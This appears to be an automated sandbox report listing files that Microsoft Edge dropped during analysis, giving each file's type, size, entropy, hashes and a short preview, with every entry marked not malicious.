SSDEEP:12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
                                                                                                                                                                                                                                                                                                MD5:6FFCCB198DC6B17E165460E6E246B03C
                                                                                                                                                                                                                                                                                                SHA1:014A46B0E6E84089E1C20FA232F54CA737D5F023
                                                                                                                                                                                                                                                                                                SHA-256:D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
                                                                                                                                                                                                                                                                                                SHA-512:846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):47
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                                                                                                MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                                                                                                SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                                                                                                SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                                                                                                SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):35
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                                                                                                MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                                                                                                SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                                                                                                SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                                                                                                SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"forceServiceDetermination":false}
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):81
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.3439888556902035
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                                                                                                                                                                MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                                                                                                                                                SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                                                                                                                                                                SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                                                                                                                                                SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):130439
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.80180718117079
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                                                                                                                                                MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                                                                                                                                                SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                                                                                                                                                SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                                                                                                                                                SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.346439344671015
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                                                                                                                                                MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                                                                                                                                                SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                                                                                                                                                SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                                                                                                                                                SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:synchronousLookupUris_638343870221005468
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):57
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.556488479039065
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                                                                                                                                                MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                                                                                                                                                SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                                                                                                                                                SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                                                                                                                                                SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):29
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.030394788231021
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                                                                                                                                                                MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                                                                                                                                                                SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                                                                                                                                                                SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                                                                                                                                                                SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:topTraffic_638004170464094982
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):575056
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.999649474060713
                                                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                                                SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                                                                                                                MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                                                                                                                SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                                                                                                SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                                                                                                SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):460992
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.999625908035124
                                                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                                                SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                                                                                                                                                MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                                                                                                                                                                SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                                                                                                                                                SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                                                                                                                                                                SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):9
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:CMzOn:CM6
                                                                                                                                                                                                                                                                                                MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                                                                                                                                                SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                                                                                                                                                SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                                                                                                                                                SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:uriCache_
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):179
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.010555532399728
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclREVcTWS5n:YWLSGTt1o9LuLgfGBPAzkVj/T8lGViTn
                                                                                                                                                                                                                                                                                                MD5:B2017AD4458171A4E5420B9CD365C6CB
                                                                                                                                                                                                                                                                                                SHA1:6F58FD27910A6173DCC7C968DFA234711BCFCC01
                                                                                                                                                                                                                                                                                                SHA-256:ADC8CD39EA90FC33BCEEEA97D5961B0CA09FF681BFCFEDA56930CDD501DEBE9D
                                                                                                                                                                                                                                                                                                SHA-512:3700A0A473A5349F35DE2CDF882C7933318FCBE91D4687C872CB3CC88BCFB1BBD7B11E903B68E0EF1639D82C715D338C2EDCBB6D33095529EFDE61C064AA9558
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1734777096370005}]}
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):86
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.3751917412896075
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQp:YQ3Kq9X0dMgAEwjj
                                                                                                                                                                                                                                                                                                MD5:F732DBED9289177D15E236D0F8F2DDD3
                                                                                                                                                                                                                                                                                                SHA1:53F822AF51B014BC3D4B575865D9C3EF0E4DEBDE
                                                                                                                                                                                                                                                                                                SHA-256:2741DF9EE9E9D9883397078F94480E9BC1D9C76996EEC5CFE4E77929337CBE93
                                                                                                                                                                                                                                                                                                SHA-512:B64E5021F32E26C752FCBA15A139815894309B25644E74CECA46A9AA97070BCA3B77DED569A9BFD694193D035BA75B61A8D6262C8E6D5C4D76B452B38F5150A4
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":1}
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):44922
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.09494174462605
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWvYi1zNtPSN6IC6CsKJDSgzMMd6qD47u3+CioC:+/Ps+wsI7yn/FKtSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                MD5:17DD9B46D87BDB86C4D0A7528A9FD28E
                                                                                                                                                                                                                                                                                                SHA1:41FFB886512F4C041D5C1F8EB6EBA62C0D594AE0
                                                                                                                                                                                                                                                                                                SHA-256:8567EBFEC30F1BE0B55CABECBE374A2EE98FF5E42DD4ED62D639D83B94C0332A
                                                                                                                                                                                                                                                                                                SHA-512:42D7DFCA272E2165299F690E55FC78783DA400DB6FC511120FC856C4AFE4A5435302B0D0302C3CCAF4028791420400AA4B3D2C1D52E127D559541710437E6B53
                                                                                                                                                                                                                                                                                                Malicious:false
Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):44455
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.089772247328986
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kW6di1zNtPM9kzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynOukzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                MD5:6356EC0D498B0C96EB67C9B703292822
                                                                                                                                                                                                                                                                                                SHA1:04F3FD4D1E2C26E4D515AF619FC43F4648D889AA
                                                                                                                                                                                                                                                                                                SHA-256:D26948D35C2A90233F45991416939161E8062EE802836E5C068A69AFB940C99B
                                                                                                                                                                                                                                                                                                SHA-512:37D6613948326F6775EDF004CF7FE1763904A0FC3FA940BD62722DDC9A745A271BDD59122DDF22860941A5FA235BF5FC51273E4E2019D138CCBC7928CF41E68D
                                                                                                                                                                                                                                                                                                Malicious:false
Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):44988
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.095138731373029
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4xW2Yi1zNtPS92uzh9LVjhKJDSgzMMd6qD47u3+CioC:+/Ps+wsI7yOGLKtSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                MD5:D957DFC31F3F54BE0AC13CC2E1F127AF
                                                                                                                                                                                                                                                                                                SHA1:75DDAE21C05A642562554FD1BC784634F3448D21
                                                                                                                                                                                                                                                                                                SHA-256:AF00FBD0969B99A381F0993C4BE3835EED77B0CA159D2250F6EF0C031723ABFF
                                                                                                                                                                                                                                                                                                SHA-512:A7824DC59DAE7419B773190715387785F22D07BFEA518DFD3DC2D1CAC5E2F0C6C042C27B122462D77EB9D1AF855ECC56B90E5A371F1404218EBE1152C553F0B5
                                                                                                                                                                                                                                                                                                Malicious:false
Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2278
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.8567878402608633
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:uiTrlKxrgx2xl9Il8um2F3Q9/4oulR/XU8d1rc:mnYgK3Q9/fgQ
                                                                                                                                                                                                                                                                                                MD5:B57625228DF9BA51C72491C5B4C84E54
                                                                                                                                                                                                                                                                                                SHA1:0ACA5256A3E8B58275DF30405C747D87EBB3EDEA
                                                                                                                                                                                                                                                                                                SHA-256:225D61634DC698A4D95A6BC543F0237133D272FB9691D3DCD3300A7A54DE6AC6
                                                                                                                                                                                                                                                                                                SHA-512:DC6A09B0E359091E4C74F99BC3F0C4C4BE41B349909A71118AA6BA037C8850C25595C78F04EFAA56488972BFDCCBCC6DE170633D8E26F10B7BCAA2F368053803
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.I.8.N.M.r.F.S.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.C.t.g.l.0.y.
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):4622
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.9945724843531507
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:SYgKf0JsbFpHOPP0GBM2Z0I2R+YcVQXvFyCvqXcAn:SnJWyrRZ0tRWyZiR
                                                                                                                                                                                                                                                                                                MD5:834850807AFA9CAB8F613D6BCD551746
                                                                                                                                                                                                                                                                                                SHA1:0733B37FBF1B714C8FD799FFD866E5F520AB4986
                                                                                                                                                                                                                                                                                                SHA-256:5EBB18CEB4D77BF378356E8E4FDB445B0E56FD6A0A8D1E66B732A55D543E2F58
                                                                                                                                                                                                                                                                                                SHA-512:0CB46403E7F67A1E79D794E439A5FC5F20BA94A2386E4E0E8037539C0D73F418463DBB4817A80AC73535DBC8001D2F5CD99B4683BAA06316D6CA7B354A0D83B2
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".Y.A.3.2.F.6.l.S.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.C.t.g.l.0.y.
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2684
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.9113697755471475
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:uiTrlKx68Wa7xzYyxl9Il8um2Fjwl0ORJoZq1kJEOU3mmBOE/El6qzd/vc:aB3YgK8l02JEq1qU3PBOE/iJu
                                                                                                                                                                                                                                                                                                MD5:C9D11BE358257A32356010D75B27E8D2
                                                                                                                                                                                                                                                                                                SHA1:512EAA9F12BE1E9A188CDAF6B5E2F0389CDEBC4C
                                                                                                                                                                                                                                                                                                SHA-256:C5279EF75EFAD0BEC1CE176A18D160C1E6768FAF54468C30ADE995C5A293E718
                                                                                                                                                                                                                                                                                                SHA-512:2CD80C5147DCEBF9B195D986408F9E392FDF51B64D1BCBCD863408D8E91523405143DF01FD59DAAA305F6987A67FCD02D76063687D2FAB8B7112128329A22B85
                                                                                                                                                                                                                                                                                                Malicious:false
